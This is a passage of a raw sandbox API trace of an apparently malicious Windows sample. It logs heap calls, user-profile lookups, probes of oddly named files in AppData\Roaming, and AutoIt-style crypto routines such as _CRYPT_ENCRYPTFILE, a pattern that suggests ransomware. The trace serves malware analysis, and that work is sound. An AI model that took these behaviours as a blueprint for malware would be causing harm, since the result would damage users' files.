RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0225.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0225.919] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0225.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0225.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0225.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0225.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0225.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0225.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0225.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0225.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0225.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0225.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0225.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0225.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0226.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0226.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0226.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0226.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0226.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0226.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0226.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0226.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x58) returned 0x2e564e0 [0226.050] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/bfVxZ90.avi", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\bfVxZ90.avi", lpFilePart=0x8cf650*="bfVxZ90.avi") returned 0x2b [0226.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0226.050] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\bfVxZ90.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\bfvxz90.avi")) returned 0xffffffff [0226.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0226.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0226.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0226.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0226.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0226.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0226.050] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0226.051] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0226.051] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0226.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0226.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0226.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0226.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0226.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0226.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0226.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BTjJSlc2bP-ki.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0226.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TjJSlc2bP-ki.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0226.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jJSlc2bP-ki.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0226.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JSlc2bP-ki.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0226.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Slc2bP-ki.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0226.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lc2bP-ki.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0226.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c2bP-ki.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0226.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2bP-ki.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0226.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bP-ki.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0226.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-ki.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0226.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-ki.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0226.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ki.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0226.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0226.052] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0226.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0226.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0226.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0226.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0226.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0226.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BTjJSlc2bP-ki.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0226.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TjJSlc2bP-ki.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0226.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jJSlc2bP-ki.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0226.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JSlc2bP-ki.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0226.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Slc2bP-ki.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0226.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lc2bP-ki.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0226.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c2bP-ki.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0226.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2bP-ki.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0226.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bP-ki.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0226.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-ki.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0226.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-ki.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0226.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ki.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0226.053] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0226.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0226.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0226.053] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0226.053] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0226.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0226.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0226.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0226.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0226.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0226.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0226.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0226.053] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0226.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0226.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0226.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0226.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0226.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0226.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0226.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0226.054] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0226.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0226.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0226.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0226.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0226.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0226.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0226.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0226.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0226.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0226.054] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0226.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0226.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0226.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0226.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0226.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0226.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0226.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0226.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0226.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0226.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0226.055] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0226.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0226.055] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0226.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0226.055] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/BTjJSlc2bP-ki.swf", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bbd63b0, ftCreationTime.dwHighDateTime=0x1d5e3da, ftLastAccessTime.dwLowDateTime=0x53cd0620, ftLastAccessTime.dwHighDateTime=0x1d5e411, ftLastWriteTime.dwLowDateTime=0x53cd0620, ftLastWriteTime.dwHighDateTime=0x1d5e411, nFileSizeHigh=0x0, nFileSizeLow=0x24f6, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="BTjJSlc2bP-ki.swf", cAlternateFileName="BTJJSL~1.SWF")) returned 0xa874d0 [0226.056] FindClose (in: hFindFile=0xa874d0 | out: hFindFile=0xa874d0) returned 1 [0226.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0226.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0226.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0226.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0226.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0226.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0226.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0226.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0226.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0226.056] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0226.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0226.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0226.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0226.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0226.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0226.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0226.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0226.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0226.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0226.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0226.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0226.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0226.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0226.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0226.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0226.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0226.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0226.057] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0226.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0226.057] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0226.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0226.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0226.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0226.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0226.057] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0226.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0226.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0226.057] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0226.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0226.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0226.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0226.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0226.058] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0226.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0226.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0226.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0226.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0226.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0226.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0226.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0226.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0226.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0226.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0226.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0226.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0226.058] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0226.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0226.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0226.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0226.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0226.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0226.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0226.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0226.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0226.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0226.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0226.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0226.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0226.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0226.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0226.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0226.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0226.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0226.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0226.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0226.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0226.059] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0226.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0226.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0226.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0226.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0226.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0226.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0226.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0226.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0226.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0226.060] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0226.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0226.060] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0226.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0226.060] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0226.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0226.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0226.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0226.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 